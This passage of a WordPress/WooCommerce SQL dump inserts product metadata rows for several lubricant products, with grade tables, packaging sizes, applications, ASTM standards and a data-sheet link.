INSERT INTO `wp_postmeta` VALUES (7522, 821, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7523, 821, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7524, 821, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7525, 821, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7526, 821, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7527, 821, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7528, 821, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7529, 821, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7530, 821, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7531, 821, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7532, 821, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7533, 821, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7534, 821, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7535, 821, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7536, 821, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7537, 821, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7538, 821, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7539, 821, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7540, 821, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7541, 821, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7542, 821, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7543, 821, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7544, 821, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7545, 821, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7547, 821, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7548, 821, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7570, 821, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7571, 821, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7572, 822, '_edit_lock', '1475589798:2'); 
INSERT INTO `wp_postmeta` VALUES (7573, 822, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7574, 822, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7575, 822, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7576, 822, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7577, 822, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7578, 822, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7579, 822, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7580, 822, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7581, 822, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7582, 822, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7583, 822, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7584, 822, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7585, 822, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7586, 822, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7587, 822, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7588, 822, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7589, 822, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7590, 822, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7591, 822, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7592, 822, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7593, 822, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7594, 822, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7595, 822, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7596, 822, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7597, 822, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7598, 822, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7599, 822, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7600, 822, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7601, 822, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7602, 822, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7603, 822, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7604, 822, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7605, 822, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7606, 822, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7607, 822, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7608, 822, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7609, 822, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7610, 822, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7612, 822, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7613, 822, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7635, 822, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7636, 822, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7637, 823, '_edit_lock', '1475589850:2'); 
INSERT INTO `wp_postmeta` VALUES (7638, 823, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7639, 823, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7640, 823, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7641, 823, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7642, 823, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7643, 823, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7644, 823, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7645, 823, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7646, 823, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7647, 823, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7648, 823, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7649, 823, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7650, 823, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7651, 823, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7652, 823, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7653, 823, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7654, 823, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7655, 823, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7656, 823, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7657, 823, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7658, 823, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7659, 823, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7660, 823, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7661, 823, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7662, 823, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7663, 823, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7664, 823, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7665, 823, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7666, 823, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7667, 823, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7668, 823, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7669, 823, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7670, 823, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7671, 823, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7672, 823, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7673, 823, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7674, 823, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7675, 823, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7677, 823, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7678, 823, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7700, 823, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7701, 823, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7702, 824, '_edit_lock', '1475590171:2'); 
INSERT INTO `wp_postmeta` VALUES (7703, 824, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7704, 824, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7705, 824, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7706, 824, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7707, 824, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7708, 824, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7709, 824, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7710, 824, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7711, 824, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7712, 824, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7713, 824, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7714, 824, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7715, 824, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7716, 824, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7717, 824, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7718, 824, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7719, 824, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7720, 824, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7721, 824, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7722, 824, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7723, 824, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7724, 824, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7725, 824, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7726, 824, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7727, 824, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7728, 824, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7729, 824, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7730, 824, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7731, 824, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7732, 824, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7733, 824, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7734, 824, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7735, 824, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7736, 824, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7737, 824, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7738, 824, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7739, 824, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7740, 824, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7742, 824, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7743, 824, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7765, 824, 'total_sales', '0'); 
